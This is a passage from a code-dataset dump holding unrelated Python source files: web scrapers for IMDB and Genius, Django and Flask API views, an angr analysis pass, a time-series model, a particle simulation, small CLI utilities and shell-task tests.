content='\\n'.join(sends))\n                self.fake_messages[guild_id][resp_id] = mock_message\n\n            resp = {\n                'guildId': guild_id,\n                'actions': [{\n                    'action': LogActions.MESSAGE_SEND,\n                    'content': '\\n'.join(sends),\n                    'messageId': resp_id,\n                }]\n            }\n            resp['actions'] += [{\n                'action': LogActions.REACTION_ADD,\n                'emoji': r[1],\n                'messageId': resp_id,\n            } for r in reactions]\n\n        elif action == LogActions.MESSAGE_DELETE:\n            pass\n\n        elif action == LogActions.REACTION_ADD:\n            resp_id = message_id\n            fkmsg = self.fake_messages[guild_id][resp_id]\n            fkmsg.sends = sends\n            react = await fkmsg.add_reaction(emoji, bot=False)\n            await self.bot.cogs[\"Events\"].on_reaction_add(react, MockMember())\n\n            resp = {\n                'guildId': guild_id,\n                'actions': ({\n                    'action': LogActions.MESSAGE_EDIT,\n                    'content': '\\n'.join(sends),\n                    'messageId': resp_id,\n                },)\n            }\n        elif action == LogActions.REACTION_REMOVE:\n            resp_id = message_id\n            fkmsg = self.fake_messages[guild_id][resp_id]\n            fkmsg.sends = [fkmsg.content]\n            react = await fkmsg.remove_reaction(emoji)\n            await self.bot.cogs[\"Events\"].on_reaction_remove(react, MockMember())\n\n            resp = {\n                'guildId': guild_id,\n                'actions': ({\n                    'action': LogActions.MESSAGE_EDIT,\n                    'content': '\\n'.join(sends),\n                    'messageId': resp_id,\n                },)\n            }\n\n        return resp, sc.OK_200\n\n\ndef setup(bot):\n    bot.add_cog(Api(bot))\n","sub_path":"shard/src/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"262645020","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom urllib import parse\nfrom scrapy.http import Request\nimport re\nfrom Article.items import MovieItem,ArticleItem\nfrom scrapy.loader import ItemLoader\n\n\nclass JobboleSpider(scrapy.Spider):\n    name = 'IMDB'\n    allowed_domains = ['www.imdb.com']\n    start_urls = ['http://www.imdb.com/chart/top']\n\n    def parse(self, response):\n        movies_nodes= response.css('.lister-list tr')\n        for node in movies_nodes:\n\n            avatar_url=[]\n            movie_avatar= node.css('.posterColumn img::attr(src)').extract_first(\"\")\n            movie_url= node.css('.titleColumn a::attr(href)').extract_first(\"\")\n            title= node.css('.titleColumn a::text').extract_first(\"\")\n            year = node.css('.titleColumn span::text').extract_first(\"\")\n            if year:\n                res = (re.match(\".*(\\d{4}).*\",year))\n                if res:\n                    year=int(res.group(1))\n            rating = node.css(\".imdbRating strong::text\").extract_first(\"\")\n\n\n            print(parse.urljoin(response.url,movie_url))\n            yield  Request(url=(parse.urljoin(response.url,movie_url)),\n                    meta={\"title\":title,\"year\":year,\"rating\":rating,\"movie_avatar\":movie_avatar},\n                    callback=self.parse_detail)\n\n\n    def parse_detail(self,response):\n        Movie_Item=MovieItem()\n        summury= response.css(\".plot_summary \")\n        desc= summury.css('.summary_text::text').extract()[0].strip().split(\"\\n\")\n        director= summury.css('span[itemprop=\"director\"] span::text').extract()\n        cast = summury.css('span[itemprop=\"actors\"] a span::text').extract()\n        video_url=\"http://www.imdb.com\"+response.css('.video_slate a::attr(href)').extract_first(\"\")\n        count=1\n        Movie_Item[\"title\"]=response.meta[\"title\"]\n        Movie_Item[\"year\"] = response.meta.get(\"year\", \"\")\n        Movie_Item[\"rating\"] = response.meta.get(\"rating\", \"\")\n        avatar_url=[]\n        video_urls=[]\n        avatar_url.append(response.meta.get(\"movie_avatar\", \"\"))\n        video_urls.append(video_url)\n        Movie_Item[\"movie_avatar\"] = avatar_url\n        Movie_Item[\"desc\"] = \",\".join(desc)\n        Movie_Item[\"director\"] = \"/\".join(director)\n        Movie_Item[\"cast\"] = \"/\".join(cast)\n        Movie_Item[\"video_url\"] = video_url\n        item_loader=ItemLoader(item = MovieItem(),response=response)\n        return Movie_Item\n\n","sub_path":"IMDB.py","file_name":"IMDB.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"450735384","text":"import bs4\nimport requests\n\nsong_name = input(\"Enter name of song\")\nartist_name = input(\"Enter name of artist\")\n\nsong_name = song_name.replace(\" \",\"-\")\nartist_name = artist_name.replace(\" \",\"-\")\n\nurl = \"https://genius.com/\"+artist_name+\"-\"+song_name+\"-lyrics\"\nreq = requests.get(url)\nsoup = bs4.BeautifulSoup(req.text,\"lxml\")\nlyrics = soup.select(\"p\")\nlyrics = lyrics[0].text\nprint(lyrics)\n\n","sub_path":"LyricsScraper.py","file_name":"LyricsScraper.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"220856530","text":"from rest_framework.generics import (ListAPIView, RetrieveAPIView, DestroyAPIView,\n                                     CreateAPIView, RetrieveUpdateAPIView)\n\nfrom rest_framework.permissions import (IsAuthenticated, IsAdminUser, IsAuthenticatedOrReadOnly, AllowAny)\nfrom rest_framework.filters import (SearchFilter,\n                                    OrderingFilter,)\nfrom .serializers import CommentSerializer, CommentDetailSerializer\nfrom comments.models import Comment\nfrom posts.api.permissions import IsOwnerOrReadOnly\nfrom posts.api.pagination import PostLimitOffsetPagination\nfrom django.db.models import Q\n\n#class PostCreateAPIView(CreateAPIView):\n    #queryset = Post.objects.all()\n    #serializer_class = PostCreateUpdateSerializer\n    #permission_classes = [IsAuthenticated]\n\n    #def perform_create(self, serializer):\n        #serializer.save(user=self.request.user)\n\nclass CommentDetailAPIView(RetrieveAPIView):\n    queryset = Comment.objects.all()\n    serializer_class = CommentDetailSerializer\n    lookup_field = 'pk'\n\n#class PostUpdateAPIView(RetrieveUpdateAPIView):\n    #queryset = Post.objects.all()\n    #serializer_class = PostCreateUpdateSerializer\n    #lookup_field = 'slug'\n    #permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n    #def perform_update(self, serializer):\n        #serializer.save(user=self.request.user)\n\n#class PostDeleteAPIView(DestroyAPIView):\n #   queryset = Post.objects.all()\n #  serializer_class = PostDetailSerializer\n #  lookup_field = 'slug'\n #   permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\nclass CommentListAPIView(ListAPIView):\n    serializer_class = CommentSerializer\n    filter_backends = [SearchFilter, OrderingFilter]\n    search_fields = ['content', 'user__first_name']\n    pagination_class = PostLimitOffsetPagination\n    def get_queryset(self, *args, **kwargs):\n        queryset_list = Comment.objects.all()\n        query = self.request.GET.get(\"q\")\n        if query:\n            queryset_list = queryset_list.filter(\n                Q(title__icontains=query)|\n                Q(content__icontains=query)|\n                Q(user__first_name__icontains=query)|\n                Q(user__last_name__icontains=query)\n            ).distinct()\n        return queryset_list\n","sub_path":"comments/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"37810498","text":"\nimport logging\n\nfrom angr import Analysis, register_analysis\nfrom angr.analyses.reaching_definitions import OP_BEFORE\nfrom angr.calling_conventions import SimRegArg, SimStackArg\n\nfrom .. import Stmt, Expr\n\nl = logging.getLogger('ailment.callsite_maker')\n\n\nclass CallSiteMaker(Analysis):\n    \"\"\"\n    Add calling convention, declaration, and args to a call site.\n    \"\"\"\n    def __init__(self, block):\n        self.block = block\n\n        self._reaching_definitions = None\n\n        self.result_block = None\n\n        self._analyze()\n\n    def _analyze(self):\n\n        last_stmt = self.block.statements[-1]\n\n        if not type(last_stmt) is Stmt.Call:\n            self.result_block = self.block\n            return\n\n        target = self._get_call_target(last_stmt)\n\n        if target is None:\n            return\n\n        if target not in self.kb.functions:\n            return\n\n        func = self.kb.functions[target]\n\n        if func.prototype is None:\n            func.find_declaration()\n\n        if func.prototype is None:\n            # cannot find a declaration to it\n            return\n\n        # Make arguments\n        args = [ ]\n        if func.calling_convention is None:\n            l.warning('%s has an unknown calling convention.', repr(func))\n        else:\n            arg_locs = func.calling_convention.arg_locs()\n            for arg_loc in arg_locs:\n                if type(arg_loc) is SimRegArg:\n                    size = arg_loc.size\n                    offset = arg_loc._fix_offset(None, size, arch=self.project.arch)\n                    args.append(Expr.Register(None, None, offset, size * 8, reg_name=arg_loc.reg_name))\n                else:\n                    raise NotImplementedError('Not implemented yet.')\n\n        new_stmts = self.block.statements[::]\n\n        new_stmts[-1] = Stmt.Call(last_stmt, last_stmt.target,\n                                  calling_convention=func.calling_convention,\n                                  prototype=func.prototype,\n                                  args=args,\n                                  **last_stmt.tags\n                                  )\n\n        new_block = self.block.copy()\n        new_block.statements = new_stmts\n\n        self.result_block = new_block\n\n    def _get_call_target(self, stmt):\n        \"\"\"\n\n        :param Stmt.Call stmt:\n        :return:\n        \"\"\"\n\n        if type(stmt.target) is Expr.Const:\n            return stmt.target.value\n\n        return None\n\nregister_analysis(CallSiteMaker, 'AILCallSiteMaker')\n","sub_path":"l3/venv-angr/lib/python3.5/site-packages/ailment/analyses/callsite_maker.py","file_name":"callsite_maker.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"321136711","text":"from .base_exception import BaseException\n\n\nclass APIResponseError(BaseException):\n\n    status_code = 400\n\n    def __init__(self, error, status_code=None, payload=None):\n        Exception.__init__(self)\n        self._error = error\n        if status_code is not None:\n            self.status_code = status_code\n        self.payload = payload\n\n    def to_dict(self):\n        return_value = dict(self.payload or ())\n        return_value['status'] = 'error'\n        return_value['message'] = self._error\n        return return_value\n","sub_path":"app/exceptions/api_response_error.py","file_name":"api_response_error.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"605008770","text":"from typing import List, Tuple\nimport pygame\nfrom particle import Particle\nfrom sorting import bubble_sort\n\nWINDOW_SIZE = (768 // 4 * 3, 768 // 4 * 3)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\nDIM = 8  # height/width of dot\nN = 512  # number of dots\nice_list = []  # list holding dots\n\n\nif __name__ == '__main__':\n    screen = pygame.display.set_mode(WINDOW_SIZE)  # change window size\n    pygame.display.set_caption('Particles!')       # change window name\n    done = False\n    clock = pygame.time.Clock()\n\n    ice_list.append(Particle(DIM, free=False))  # create centre particle\n    ice_list[0].move(WINDOW_SIZE[0] // 2, WINDOW_SIZE[1] // 2)\n    ice_list[0].quantize_pos()\n\n    for _ in range(N - 1):  # create particles\n        x = Particle(DIM)\n        x.move_to_random_pos(0, 0, WINDOW_SIZE[0], WINDOW_SIZE[1])\n        x.quantize_pos()\n        ice_list.append(x)\n\n    while not done:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:  # if a QUIT event is received\n                done = True                # end the program\n\n        screen.fill(WHITE)  # reset screen to white before drawing\n\n        for ice in ice_list:\n            ice.step_drunk_float_jumps()  # move particle, keep within screen\n            ice.move_into_bounds(0, 0, WINDOW_SIZE[0], WINDOW_SIZE[1])\n            ice.draw(screen)  # draw particle\n\n        # check for collision between stuck particles and free particles\n        for ice1 in filter(lambda ice: not ice.free, ice_list):\n            for ice2 in filter(lambda ice: ice.free, ice_list):\n                if ice1.check_collision(ice2):  # if there is a collision\n                    ice2.free = False           # make free particle stuck\n\n        pygame.display.flip()  # update screen\n        clock.tick(60)  # set frame rate\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"271091726","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\nimport errno\nfrom os import environ, listdir, makedirs, remove\nfrom os.path import expanduser, isfile, join\nfrom shutil import copyfile\nfrom sys import exit\nfrom subprocess import call\n\nHOME = expanduser('~')\nTEMPLATE_PATH = HOME + '/.stencil/'\nEDITOR = environ.get('EDITOR', 'vim')\n\ndef create_arg_parser():\n  parser = ArgumentParser(description=\"Organized templating.\")\n  parser.add_argument('-e', '--edit', help=\"edit a template\", metavar='')\n  parser.add_argument('-i', '--install', help=\"create a template\", metavar='')\n  parser.add_argument('-rm', '--remove', help=\"remove a template\", metavar='')\n  parser.add_argument('-ls', '--list', action='store_true', help=\"list template files\")\n  parser.add_argument('src', nargs='?', help=\"template to use\")\n  parser.add_argument('dest', nargs='?', help=\"file to create from template\")\n  return parser\n\ndef validate_args(args):\n  args_bool = [bool(v) for (k, v) in args.items() if k != 'src' and k != 'dest']\n  num_args_set = sum(args_bool)\n  if num_args_set > 1:\n    print(\"error: please use one flag at a time\")\n    exit()\n  if args['src'] is not None:\n    if num_args_set > 0:\n      print(\"error: invalid flag usage, please see --help for proper usage\")\n      exit()\n\ndef file_not_found(file_name):\n  print(\"error: could not find file: \" + str(file_name))\n  exit()\n\n# Equivalent to makedirs(path, exist_ok=True) in Python 3.2+\ndef check_and_make_dir(path):\n  try:\n    makedirs(path)\n  except OSError as exception:\n    if exception.errno != errno.EEXIST:\n      raise\n\ndef main():\n  check_and_make_dir(TEMPLATE_PATH)\n  arg_parser = create_arg_parser()\n  args = arg_parser.parse_args()\n  validate_args(vars(args))\n  if args.install is not None:\n    template_file = TEMPLATE_PATH + str(args.install)\n    if isfile(args.install):\n      copyfile(args.install, template_file)\n    else:\n      call([EDITOR, template_file])\n  elif args.edit is not None:\n    template_file = TEMPLATE_PATH + str(args.edit)\n    if isfile(template_file):\n      call([EDITOR, template_file])\n    else:\n      file_not_found(template_file)\n  elif args.remove is not None:\n    template_file = TEMPLATE_PATH + str(args.remove)\n    if isfile(template_file):\n      remove(template_file)\n    else:\n      file_not_found(template_file)\n  elif args.list == True:\n    template_files = [f for f in listdir(TEMPLATE_PATH) if isfile(join(TEMPLATE_PATH, f))]\n    for f in template_files:\n      print(str(f) + ' ')\n  elif args.src is not None:\n    template_file = TEMPLATE_PATH + str(args.src)\n    if isfile(template_file):\n      if args.dest is None:\n        args.dest = args.src\n      copyfile(template_file, str(args.dest))\n    else:\n      file_not_found(template_file)\n\nif __name__ == \"__main__\":\n  main()\n","sub_path":"stencil.py","file_name":"stencil.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"235064175","text":"import sys\nif sys.version_info < (3,):\n    range = xrange\n\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as ss\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom ..parameter import Parameter, Parameters\nfrom .. import inference as ifr\nfrom .. import tsm as tsm\nfrom .. import distributions as dst\nfrom .. import data_check as dc\n\nfrom .scores import *\nfrom .gas import *\n\nclass GASExponential(GAS):\n    \"\"\" Inherits GAS methods from GAS class (and time series methods from TSM class).\n\n    **** EXPONENTIAL GENERALIZED AUTOREGRESSIVE SCORE (GAS) MODELS ****\n\n    Parameters\n    ----------\n    data : pd.DataFrame or np.array\n        Field to specify the univariate time series data that will be used.\n\n    ar : int\n        Field to specify how many AR lags the model will have.\n\n    sc : int\n        Field to specify how many score lags terms the model will have.\n\n    integ : int (default : 0)\n        Specifies how many time to difference the time series.\n\n    target : str (pd.DataFrame) or int (np.array)\n        Specifies which column name or array index to use. By default, first\n        column/array will be selected as the dependent variable.\n\n    gradient_only : Boolean (default: True)\n        If true, will only use gradient rather than second-order terms\n        to construct the modified score.\n    \"\"\"\n\n    def __init__(self,data,ar,sc,integ=0,target=None,gradient_only=False):\n\n        # Initialize TSM object     \n        super(GASExponential,self).__init__(data=data,ar=ar,sc=sc,integ=integ,\n            target=target,gradient_only=gradient_only)\n\n        self.model_name = \"EXPONENTIAL GAS(\" + str(self.ar) + \",\" + str(self.integ) + \",\" + str(self.sc) + \") REGRESSION\"\n        self.dist = 'Exponential'\n        self.link = np.exp\n        self.scale = False\n        self.shape = False\n        self.parameters.parameter_list[0].start = np.log(1/np.mean(self.data))\n\n        if gradient_only is False:\n            self.score_function = self.adj_score_function\n        else:\n            self.score_function = self.default_score_function\n\n    def _mean_prediction(self,theta,Y,scores,h,t_params):\n        \"\"\" Creates a h-step ahead mean prediction\n\n        Parameters\n        ----------\n        theta : np.array\n            The past predicted values\n\n        Y : np.array\n            The past data\n\n        scores : np.array\n            The past scores\n\n        h : int\n            How many steps ahead for the prediction\n\n        t_params : np.array\n            A vector of (transformed) parameters\n\n        Returns\n        ----------\n        Y_exp : np.array\n            Vector of past values and predictions \n        \"\"\"     \n\n        Y_exp = Y.copy()\n        theta_exp = theta.copy()\n        scores_exp = scores.copy()\n\n        #(TODO: vectorize the inner construction here)      \n        for t in range(0,h):\n            new_value = t_params[0]\n\n            if self.ar != 0:\n                for j in range(1,self.ar+1):\n                    new_value += t_params[j]*theta_exp[-j]\n\n            if self.sc != 0:\n                for k in range(1,self.sc+1):\n                    new_value += t_params[k+self.ar]*scores_exp[-k]\n\n            Y_exp = np.append(Y_exp,[1/self.link(new_value)])\n            theta_exp = np.append(theta_exp,[new_value]) # For indexing consistency\n            scores_exp = np.append(scores_exp,[0]) # expectation of score is zero\n\n  
      return Y_exp\n\n    def adj_score_function(self,y,mean,scale,shape):\n        return ExponentialScore.log_lam_adj_score(y, mean)\n\n    def draw_variable(self,loc,scale,shape,nsims):\n        return np.random.exponential(1/loc, nsims)\n\n    def neg_loglik(self,beta):\n        theta, Y, scores = self._model(beta)\n        return -np.sum(ss.expon.logpdf(x=Y,scale=1/self.link(theta)))\n\n    def default_score_function(self,y,mean,scale,shape):\n        return ExponentialScore.log_lam_score(y, mean)\n\n    def predict_is(self,h=5):\n        \"\"\" Makes dynamic in-sample predictions with the estimated model\n\n        Parameters\n        ----------\n        h : int (default : 5)\n            How many steps would you like to forecast?\n\n        Returns\n        ----------\n        - pd.DataFrame with predicted values\n        \"\"\"     \n\n        predictions = []\n\n        for t in range(0,h):\n            x = GASExponential(ar=self.ar,sc=self.sc,integ=self.integ,data=self.data_original[:-h+t])\n            x.fit(printer=False)\n            \n            if t == 0:\n                predictions = x.predict(1)\n            else:\n                predictions = pd.concat([predictions,x.predict(1)])\n        \n        predictions.rename(columns={0:self.data_name}, inplace=True)\n        predictions.index = self.index[-h:]\n\n        return predictions\n\n    def plot_fit(self,intervals=False,**kwargs):\n        \"\"\" Plots the fit of the model\n\n        Returns\n        ----------\n        None (plots data and the fit)\n        \"\"\"\n\n        figsize = kwargs.get('figsize',(10,7))\n\n        if self.parameters.estimated is False:\n            raise Exception(\"No parameters estimated!\")\n        else:\n            date_index = self.index[max(self.ar,self.sc):]\n            mu, Y, scores = self._model(self.parameters.get_parameter_values())\n\n            if intervals == True:\n                sim_vector = self.link([self._bootstrap_scores(self.parameters.get_parameter_values()) for i in range(1000)]).T\n                error_bars = []\n                error_bars.append(1/np.array([np.percentile(i,5) for i in sim_vector]))\n                error_bars.append(1/np.array([np.percentile(i,95) for i in sim_vector]))\n\n            plt.figure(figsize=figsize)\n            plt.subplot(2,1,1)\n            plt.title(\"Model fit for \" + self.data_name)\n\n            if intervals == True:\n                alpha =[0.15*i/float(100) for i in range(50,12,-2)]\n                plt.fill_between(date_index, error_bars[0], error_bars[1], alpha=0.15,label='95% Confidence Interval')  \n\n            plt.plot(date_index,Y,label='Data')\n            plt.plot(date_index,1/self.link(mu),label='GAS Filter',c='black')\n            plt.legend(loc=2)   \n\n            plt.subplot(2,1,2)\n\n            if intervals == True:\n                alpha =[0.15*i/float(100) for i in range(50,12,-2)]\n                plt.fill_between(date_index, error_bars[0], error_bars[1], alpha=0.15,label='95% Confidence Interval')  \n\n            plt.plot(date_index,1/self.link(mu),label='GAS Filter',c='black')\n            plt.title(\"Filtered values for \" + self.data_name)\n            plt.legend(loc=2)   \n\n            plt.show()              \n    \n    def plot_predict(self,h=5,past_values=20,intervals=True,**kwargs):\n        \"\"\" Makes forecast with the estimated model\n\n        Parameters\n        ----------\n        h : int (default : 5)\n            How many steps ahead would you like to forecast?\n\n        
past_values : int (default : 20)\n            How many past observations to show on the forecast graph?\n\n        intervals : Boolean\n            Would you like to show prediction intervals for the forecast?\n\n        Returns\n        ----------\n        - Plot of the forecast\n        \"\"\"     \n\n        figsize = kwargs.get('figsize',(10,7))\n\n        if self.parameters.estimated is False:\n            raise Exception(\"No parameters estimated!\")\n        else:\n\n            # Retrieve data, dates and (transformed) parameters\n            theta, Y, scores = self._model(self.parameters.get_parameter_values())          \n            date_index = self.shift_dates(h)\n            t_params = self.transform_parameters()\n\n            # Get mean prediction and simulations (for errors)\n            mean_values = self._mean_prediction(theta,Y,scores,h,t_params)\n            sim_values = self._sim_prediction(theta,Y,scores,h,t_params,15000)\n            error_bars, forecasted_values, plot_values, plot_index = self._summarize_simulations(mean_values,sim_values,date_index,h,past_values)\n\n            plt.figure(figsize=figsize)\n            if intervals == True:\n                alpha =[0.15*i/float(100) for i in range(50,12,-2)]\n                for count, pre in enumerate(error_bars):\n                    plt.fill_between(date_index[-h-1:], forecasted_values-pre, forecasted_values+pre,\n                        alpha=alpha[count])         \n            \n            plt.plot(plot_index,plot_values)\n            plt.title(\"Forecast for \" + self.data_name)\n            plt.xlabel(\"Time\")\n            plt.ylabel(self.data_name)\n            plt.show()\n\n    def predict(self,h=5):\n        \"\"\" Makes forecast with the estimated model\n\n        Parameters\n        ----------\n        h : int (default : 5)\n            How many steps ahead would you like to forecast?\n\n        Returns\n        ----------\n        - pd.DataFrame with predicted values\n        \"\"\"     \n\n        if self.parameters.estimated is False:\n            raise Exception(\"No parameters estimated!\")\n        else:\n\n            theta, Y, scores = self._model(self.parameters.get_parameter_values())          \n            date_index = self.shift_dates(h)\n            t_params = self.transform_parameters()\n\n            mean_values = self._mean_prediction(theta,Y,scores,h,t_params)\n            forecasted_values = mean_values[-h:]\n            result = pd.DataFrame(1/forecasted_values)\n            result.rename(columns={0:self.data_name}, inplace=True)\n            result.index = date_index[-h:]\n\n            return result","sub_path":"pyflux/gas/gasexponential.py","file_name":"gasexponential.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"328668938","text":"import numpy as np\nimport pickle\n\nfrom qanta.features.abstract import AbstractFeatureExtractor\nfrom qanta.util.constants import SENTENCE_STATS\nfrom qanta.util.environment import QB_QUESTION_DB\nfrom qanta.util.io import safe_open\nfrom qanta.datasets.quiz_bowl import QuizBowlDataset, QuestionDatabase\nimport warnings\n\n\nwarnings.warn('old features extractors are deprecated and need to be rewritten', DeprecationWarning)\n\n\nclass StatsExtractor(AbstractFeatureExtractor):\n    def __init__(self):\n        super(StatsExtractor, self).__init__()\n        with open(SENTENCE_STATS, 'rb') as f:\n            self.word_count_mean, self.word_count_std = pickle.load(f)\n\n        self.guess_frequencies = {}\n        question_db = QuestionDatabase(QB_QUESTION_DB)\n        all_questions = question_db.questions_with_pages()\n        for page in all_questions:\n            self.guess_frequencies[page] = sum(1 for x in all_questions[page] if x.fold == \"train\")\n\n        self.frequency_mean = np.mean(list(self.guess_frequencies.values()))\n        self.frequency_std = np.std(list(self.guess_frequencies.values()))\n        for page in all_questions:\n            normalized_frequency = normalize(\n                self.guess_frequencies[page],\n                self.frequency_mean,\n                self.frequency_std\n            )\n            self.guess_frequencies[page] = normalized_frequency\n        self.normed_missing_guess = normalize(0, self.frequency_mean, self.frequency_std)\n\n    @property\n    def name(self):\n        return 'stats'\n\n    def score_guesses(self, guesses, text):\n        n_words = len(text.split())\n        normalized_word_count = normalize(n_words, self.word_count_mean, self.word_count_std)\n        for guess in guesses:\n            formatted_guess = guess.replace(':', '').replace('|', '')\n            normalized_guess_frequency = self.guess_frequencies.get(\n                formatted_guess, self.normed_missing_guess)\n            feature = '|stats guess_frequency:{} words_seen:{} norm_words_seen:{}'.format(\n                normalized_guess_frequency, n_words, normalized_word_count)\n            yield feature\n\n\ndef normalize(value, mean, var):\n    return (value - mean) / var\n\n\ndef compute_question_stats(question_db_path: str):\n    dataset = QuizBowlDataset(5, qb_question_db=question_db_path)\n    train_dev_questions = dataset.questions_in_folds(('train', 'dev'))\n    question_lengths = [len(q.flatten_text().split())\n                        for q in train_dev_questions]\n\n    mean = np.mean(question_lengths)\n    std = np.std(question_lengths)\n\n    stats = (mean, std)\n\n    with safe_open(SENTENCE_STATS, 'wb') as f:\n        pickle.dump(stats, f)\n","sub_path":"qanta/features/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"511184000","text":"import elasticsearch\nimport flask_restful\nfrom flask import request, g\n\nfrom app import elastic_index, RestException\nfrom app.model.resource import ThrivResource\nfrom app.model.search import Facet, FacetCount, Filter\nfrom app.resources.schema import SearchSchema, ThrivResourceSchema\nfrom app.resources.Auth import login_optional\n\n\nclass SearchEndpoint(flask_restful.Resource):\n\n    @login_optional\n    def post(self):\n        request_data = request.get_json()\n        search, errors = SearchSchema().load(request_data)\n\n        if errors: raise RestException(RestException.INVALID_OBJECT, details=errors)\n        try:\n            if 'user' not in g or not g.user or g.user.role != \"Admin\":\n                search.filters.append(Filter(field=\"Approved\", value=\"Approved\"))\n                results = elastic_index.search_resources(search)\n                search.filters = search.filters[:-1]\n            else:\n                results = elastic_index.search_resources(search)\n        except elasticsearch.ElasticsearchException as e:\n            raise RestException(RestException.ELASTIC_ERROR)\n\n        search.total = results.hits.total\n\n        search.facets = []\n        for facet_name in results.facets:\n            if facet_name == \"Approved\":\n                if 'user' in g and g.user and g.user.role == \"Admin\":\n                    facet = Facet(facet_name)\n                    facet.facetCounts = []\n                    for category, hit_count, is_selected in results.facets[facet_name]:\n                        facet.facetCounts.append(FacetCount(category, hit_count, is_selected))\n                    search.facets.append(facet)\n            else:\n                facet = Facet(facet_name)\n                facet.facetCounts = []\n                for category, hit_count, is_selected in results.facets[facet_name]:\n                    facet.facetCounts.append(FacetCount(category, hit_count, is_selected))\n                search.facets.append(facet)\n\n        resources = []\n        for hit in results:\n            resource = ThrivResource.query.filter_by(id=hit.id).first()\n            if resource is not None:\n                resources.append(resource)\n        search.resources = ThrivResourceSchema().dump(resources, many=True).data\n        return SearchSchema().jsonify(search)\n","sub_path":"backend/app/resources/SearchEndpoint.py","file_name":"SearchEndpoint.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"129611403","text":"import time\n\ndef clean(text):\n    '''处理文本以便于比较'''\n\n    # 去掉题号\n    text = text.split('.')[1]\n    # 去掉答案\n    text = text.split('@')[0]\n    # 去掉中文括号\n    text = text.split('(')[0]\n    # 去掉所有空格\n    text = text.replace(' ', '')\n    # 去掉所有逗号\n    text = text.replace(',', '')\n    # 去掉所有句号\n    text = text.replace('。', '')\n    # 英文转换为小写\n    text = text.lower()\n\n    return text\n\n\nt = time.time()\nwith open('a1_db.txt', 'r', encoding='UTF-8') as f_liuke, \\\n    open('a1去重后.txt', 'w', encoding='UTF-8') as f2:\n\n    # 分行提取六联题目,储存为列表lines_liuke\n    lines_liuke = f_liuke.readlines()\n\n    count = 0\n    for num_1st, line_1st in enumerate(lines_liuke):\n        for num_2nd, line_2nd in enumerate(lines_liuke):\n            if clean(line_1st) == clean(line_2nd) and num_1st < num_2nd:\n                count += 1\n                output = '第' + str(num_1st + 1) + '行与第' + str(num_2nd + 1) + '行重复'\n                print(output)\n                break\n        else:\n            f2.write(line_1st)\n\n\n\nprint('\\n共计耗时' + str(time.time()-t) + '秒,有' + str(count) + '道重复。')\n","sub_path":"其他/病理学/自身查重.py","file_name":"自身查重.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"547414309","text":"\"\"\"\nTests for shell task.\n\"\"\"\nfrom tests.fixtures import ProjectDirectory, project_directory\n\nimport pytest\n\n\ndef test_shell_task(project_directory: ProjectDirectory) -> None:\n    \"\"\"\n    Tests that a simple shell task (command, no argument) gets executed properly.\n    \"\"\"\n    pytest.skip(\"BROKEN\")\n    project_directory.set_config({\"LISTALL\": {\"type\": \"shell\", \"configuration\": {\"command\": \"ls\"}}})\n    output = project_directory.run_task(\"LISTALL\")\n    assert len(output) != 0\n\n\ndef test_shell_task_with_environment_variables(project_directory: ProjectDirectory) -> None:\n    \"\"\"\n    Tests a shell command w/ env. var.\n    \"\"\"\n    pytest.skip(\"BROKEN\")\n    project_directory.set_config(\n        {\"ECHO_W_ENV\": {\"type\": \"shell\", \"configuration\": {\"command\": \"env\", \"environment\": {\"TASK_OK\": \"BADABING\"}}}}\n    )\n    output = project_directory.run_task(\"ECHO_W_ENV\")\n    print(output)\n    assert \"TASK_OK=BADABING\" in output\n\n\ndef test_shell_task_with_arguments(project_directory: ProjectDirectory) -> None:\n    \"\"\"\n    Tests a shell command with arguments.\n    \"\"\"\n    pytest.skip(\"BROKEN\")\n    project_directory.set_config(\n        {\"ECHO_W_ARGS\": {\"type\": \"shell\", \"configuration\": {\"command\": \"echo\", \"arguments\": [\"Oof\", \"Ouch\"]}}}\n    )\n\n    assert \"Oof Ouch\" in project_directory.run_task(\"ECHO_W_ARGS\")\n","sub_path":"tests/tasks/test_shell.py","file_name":"test_shell.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
